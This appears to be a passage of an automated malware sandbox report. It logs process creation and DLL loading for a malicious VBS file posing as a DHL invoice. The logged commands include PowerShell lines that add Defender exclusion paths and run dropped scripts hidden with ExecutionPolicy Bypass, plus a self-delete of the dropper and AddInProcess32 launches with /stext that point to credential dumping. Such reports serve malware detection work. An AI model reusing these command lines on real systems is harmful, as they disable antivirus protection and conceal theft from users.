                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x22.ps1"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ajvsujdnntiralmilkxwkxswwkf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\lladutngjbaekramcnkpuknfxzxbri"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
